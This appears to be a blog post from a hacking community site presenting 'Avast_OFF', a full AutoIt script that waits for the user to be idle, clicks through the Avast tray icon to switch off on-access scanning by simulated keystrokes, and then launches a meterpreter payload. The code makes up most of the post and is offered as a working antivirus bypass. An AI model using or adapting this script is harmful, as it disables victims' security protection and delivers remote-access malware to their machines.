After a 4 part investigation / introduction “I was working on tutorials” to bypassing anti-virus, an update to the target product slapped me in the face, halting the mechanisms I had used for circumvention, I needed to find a solution that would allow me to continue with my deployment of meterpreter and Avast_OFF is what I came up with.

I was looking for some-way, any-way to bypass the product in question just to see how easy it was with today's tools, I had seen AutoIT used in the past and it offered everything I needed “an easy way to program GUI interaction without learning to program” most applications are designed to interact with the end user and anti-virus products are no different so using AutoIT to mimic the users actions should work? so-long as the anti-virus product allows us to execute and the user behaved as expected the result was the same! “my payload is delivered and I get the shell I'm really after.

[The script]
-----CUT-----
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#AutoIt3Wrapper_UseUpx=n
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "SysTray_UDF.au3"
#include
$ApplicationX="ashDisp.exe"
Global $iIdleTime = _Timer_GetIdleTime()
; Wait for 60 seconds of inactivity.
While $iIdleTime < "60000"
Sleep(1000)
Global $iIdleTime = _Timer_GetIdleTime()
WEnd
MsgBox(0,"I Think were alone","if you left me longer than 60 second your in for it [" & $iIdleTime & "]",2,0);
$MouseReturn=MouseGetPos()
$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")
; get tray position and move there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])
; If XP Hide Inactive Icons mode is active
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible","") Then
ControlClick($class, "", $hControl)
Sleep(1000)
EndIf
$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
$pos = _SysTrayIconPos($index)
If $pos = -1 Then
MsgBox(0,"Not Found",$ApplicationX,30,0)
Exit
Else
MouseMove($pos[0], $pos[1])
MouseClick("left")
Sleep(500)
If Not WinActive("avast! On-Access Scanner","") Then WinActivate("avast! On-Access Scanner","")
WinWaitActive("avast! On-Access Scanner","")
Send("{ALTDOWN}t{ALTUP}")
Sleep(500)
Send("y")
Sleep(500)
Send("{ALTDOWN}o{ALTUP}")
EndIf
EndIf
MouseMove($MouseReturn[0],$MouseReturn[1])
sleep(3000)
MsgBox(0,"so far so good!","with any luck AV is now off and the payload is about to be launched",4,0)
Run("meterpreter.exe","","")
-----CUT-----

There is nothing new in this information it was just an exercise for my-self, but this is my only blog so I have posted the code here.

Views: 182

Comment

You need to be a member of Dissecting The Hack to add comments!

Join Dissecting The Hack

Latest Activity

Vivian Rivera updated their profile
Wednesday
Steve Brandidge updated their profile
Jan 28
SUR3SH0T updated their profile
Oct 20, 2020
Anton Vyacheslav is now a member of Dissecting The Hack
Dec 9, 2018

Stratagem 13 News Feed

© 2021   Created by Marcus J. Carey.   Powered by

Badges  |  Report an Issue  |  Terms of Service